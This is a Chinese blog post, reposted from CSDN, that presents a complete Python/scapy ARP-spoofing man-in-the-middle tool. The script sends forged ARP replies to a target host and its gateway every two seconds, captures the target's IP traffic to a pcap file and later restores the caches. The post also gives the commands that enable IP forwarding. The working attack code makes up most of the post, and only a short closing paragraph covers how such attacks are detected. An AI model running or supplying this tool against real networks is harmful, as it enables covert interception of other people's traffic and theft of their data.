#我的武器库系列#之ARP中间人攻击

       中间人攻击与在链表的两个节点之间插入一个新节点类似:渗透人员利用 ARP 协议,向两端目标不断发送 ARP 响应报文,以替换目标缓存中的 MAC 地址,使原本 客户端->服务端(网关等) 的请求路径变为 客户端->中间人->服务端。成功后,渗透人员即可在中间节点上任意处理两端的流量。

一、源代码

# -*- coding: UTF-8 -*-
import os;
import sys;
import threading;
import signal;
from scapy.all import *
interface = "en0";  # interface used for sending and for the capture below (macOS-style name in the author's example)
target_ip = "192.168.1.20";  # address of the host whose ARP cache is poisoned
gateway_ip = "192.168.1.1";  # address of the gateway the target talks through
packet_count = 1000;  # how many packets sniff() collects before the capture is written out

# conf.iface = interface;

# conf.verb = 0;

print ("发包端口 %s" % interface);  # report which interface is in use


def get_mac(ip_address):
    """Resolve *ip_address* to a MAC address with a broadcast ARP request.

    A single who-has request is sent to the Ethernet broadcast address and
    answers are collected for up to 2 seconds, retrying unanswered probes up
    to 10 times.  The Ethernet source of the first reply is returned; when
    nothing answered, ``None`` is returned instead.
    """
    request = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address)
    answered, _ = srp(request, timeout=2, retry=10)
    if not answered:
        return None
    # Each element of the answered list is a (sent, received) pair.
    _, reply = answered[0]
    return reply[Ether].src

gateway_mac  = get_mac(gateway_ip);  # hardware address of the gateway (None if it did not answer)

target_mac = get_mac(target_ip);  # hardware address of the target (None if it did not answer)

# Report both lookups.  Each branch only prints; nothing here stops the
# script when a lookup failed, so the functions below may receive None.
if target_mac is None:
    print("目标IP不可达");
else:
    print("[%s]的mac地址为[%s]" %(target_ip,target_mac));
if gateway_mac is None:
    print("网关不可达");
else:
    print("[%s]的mac地址为[%s]" %(gateway_ip,gateway_mac));

#恢复
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    """Re-announce the genuine gateway/target MAC pairs, then interrupt this process.

    Five ARP replies (op=2) are sent in each direction carrying the real
    ``hwsrc`` so that the poisoned entries on both sides are overwritten.
    Finally SIGINT is raised in our own process; Python delivers it to the
    main thread as KeyboardInterrupt, which the ``except`` around the sniff
    in the main block handles.
    """
    print("恢复....");
    # hwdst is the broadcast address, so every host on the segment sees these
    # replies.  A burst of unsolicited ARP replies like this is exactly the
    # artifact ARP-monitoring and address-conflict detection keys on.
    send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5);
    send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5);
    # Signal ourselves rather than returning; the caller never resumes normally.
    os.kill(os.getpid(),signal.SIGINT);
#中间人攻击
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    """Send forged ARP replies to the target and the gateway every 2 seconds, forever.

    Two ARP replies (op=2) are prepared: one claiming the gateway's IP and
    addressed to the target, one claiming the target's IP and addressed to
    the gateway.  ``hwsrc`` is left unset on both, so scapy fills it with the
    local interface's own MAC (scapy default; confirm for your version) —
    that is the address that ends up in the victims' caches.
    The loop has no exit condition other than the KeyboardInterrupt handler.
    """
    # Reply pretending to be the gateway, addressed to the target.
    # NOTE: this local shadows the enclosing function's name.
    poison_target = ARP();
    poison_target.op =2;
    poison_target.psrc = gateway_ip;
    poison_target.pdst = target_ip;
    poison_target.hwdst = target_mac;

    # Reply pretending to be the target, addressed to the gateway.
    poison_gateway = ARP();
    poison_gateway.op = 2;
    poison_gateway.psrc = target_ip;
    poison_gateway.pdst = gateway_ip;
    poison_gateway.hwdst = gateway_mac

    print("开始实施攻击....");

    while True:
        try:
            send(poison_target);
            send(poison_gateway);
            # `time` is not imported explicitly; it relies on scapy.all's star import.
            time.sleep(2);
        except KeyboardInterrupt:
            # NOTE(review): this function runs on a worker thread (see the
            # threading.Thread below) and Python raises KeyboardInterrupt only
            # in the main thread, so whether this handler ever fires should be
            # confirmed; as written the loop continues after restore_target returns.
            restore_target(gateway_ip,gateway_mac,target_ip,target_mac);
    # Only reachable if the loop above ends, which it never does without a break.
    print("攻击结束....");
    return;

# Run the poisoning loop on a worker thread (non-daemon, the Thread default,
# so the process stays alive while it loops); the main thread captures traffic.
poison_thread = threading.Thread(target= poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac));
poison_thread.start();

try:
    print("启动抓包程序....");
    print("不要忘记开启 IP转发,否则目标IP无法上网。MAC:sudo sysctl -w net.inet.ip.forwarding=1 | linux: echo 1 > /proc/sys/net/ipv4/ip_forward");
    # BPF filter: only IP traffic to or from the target host.
    bpf_filter = "ip host %s" % target_ip;
    packets = sniff(count= packet_count,filter=bpf_filter,iface=interface); # block until packet_count packets are captured
    wrpcap("arpTest.pcap",packets); # write the capture to a pcap file
    # Note: on this normal completion path restore_target is never called.
except KeyboardInterrupt:
    # Ctrl-C (or the SIGINT restore_target raises) lands here:
    # re-announce the real MACs, then exit.
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac);
    sys.exit(0);

程序启动后,用 Wireshark 抓包可以看到,1.20 与 1.1 对应的 MAC 地址均已被替换为中间人的 MAC 地址。

在受攻击的客户端主机上执行 arp -a 命令即可看到,网关地址对应的 MAC 已变为中间人的 MAC。

当中间人不开启IP转发时,受攻击客户端无法进行网络通讯。

二、说点其它

       中间人攻击带来的危害非常大,不过这类攻击也很容易被发现:从地址冲突告警、MAC 地址检查、网络变慢或中断等多个维度进行观察和分析,便可快速定位问题点。基于 ARP 协议还可以做很多有趣的事情,下节分享如何基于 ARP 生成虚假节点,形成动态防御架构。

   



转载自blog.csdn.net/a59a59/article/details/96438751